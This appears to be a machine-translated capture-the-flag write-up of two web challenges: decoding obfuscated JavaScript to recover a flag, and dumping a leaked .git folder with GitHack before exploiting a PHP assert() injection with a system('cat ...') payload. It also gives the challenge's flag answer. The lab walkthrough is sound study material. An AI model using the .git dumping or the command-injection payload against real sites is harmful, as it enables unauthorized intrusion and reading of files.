Catalog

One 、simple_js

How to solve the problem ：

The process ：

Two 、mfw

How to solve the problem ：

The process ：

One 、simple_js

How to solve the problem ：

1、 understand php Code

The process ：

After entering the password in the input box

 

Ctrl+U View source code

<html>
<head>
    <title>JS</title>
    <script type="text/javascript">
    function dechiffre(pass_enc){
        var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";
        var tab  = pass_enc.split(',');
                var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;
                        k = j + (l) + (n=0);
                        n = tab2.length;
                        for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));
                                if(i == 5)break;}
                        for(i = (o=0); i < (k = j = n); i++ ){
                        o = tab[i-l];
                                if(i > 5 && i < k-1)
                                        p += String.fromCharCode((o = tab2[i]));
                        }
        p += String.fromCharCode(tab2[17]);
        pass = p;return pass;
    }
    String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));
    h = window.prompt('Enter password');
    alert( dechiffre(h) );
</script>
</head>
</html>

1、function Defines a function
2、 Cut as 2 part
3、o=tab[i-1] Invalid , Will be behind o=tab2[i] The value of
4、tab Array 、 Input parameters are not used

5、tab2 The value of the array overrides tab Value , It's useless to enter any password

---

pick up information ：

dechiffre()： take Unicode The encoding is converted to one character

fromCharCode()： Can accept a specified Unicode value , Then return a string

10 The character of the base ：

70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65

16 The character of the base ：

 \x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30

    var n=String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50);
	    document.write(n);
	var m=String.fromCharCode(70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65);
		document.write(m);

786OsErtk12

FAUX PASSWORD HAHA

---

perhaps ：

php function

<?php
$a='\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30';
$b=str_replace('\x','',$a);
echo hex2bin($b);
?>

55,56,54,79,115,69,114,116,107,49,50

---

python function

a=[55,56,54,79,115,69,114,116,107,49,50]
b=""
for i in a:
	c=chr(i)
	b=b+c
print(b)

786OsErtk12

---

 FAUX PASSWORD HAHA

( Artificial password haha )

---

Topic tips (Flag The format is Cyberpeace{xxxxxxxxx} )

therefore flag by

Cyberpeace{786OsErtk12}

Two 、mfw

 

How to solve the problem ：

1、.git Source code leakage

The process ：

Click in and find only this one

Try to see if there is git Let the cat out of the

There is git Let the cat out of the

---

 

 

Use python2.7（ I don't want to change the overall environment , Directly in python2.7 Folder run ）

GitHack：GitHub - lijiejie/GitHack: A `.git` folder disclosure exploithttps://github.com/lijiejie/GitHack

grammar ：python GitHack.py http://www.openssl.org/.git/

What I'm writing is GitHack.py The absolute path of

PS C:\Python27> python D:\BaiduNetdiskDownload\shenji\GitHack-master\GitHack.py http://61.147.171.105:62321/.git/

---

  open flag.php

I didn't find flag

 

  Source code audit wave

I found that I didn't do any filtering , Consider trying to inject  

 

---

payload：

?page=').system('cat templates/flag.php');//

') Close the front strpos function ,// Comment out the following

After injection, it is

assert("strpos('templates/').system('cat templates/flag.php');//.php', '..') === false") or die("Detected hacking attempt!");

Think of the flag.php

Can it be in the code

Ctrl+U View source code , Or use bp Grab the bag , Don't miss many details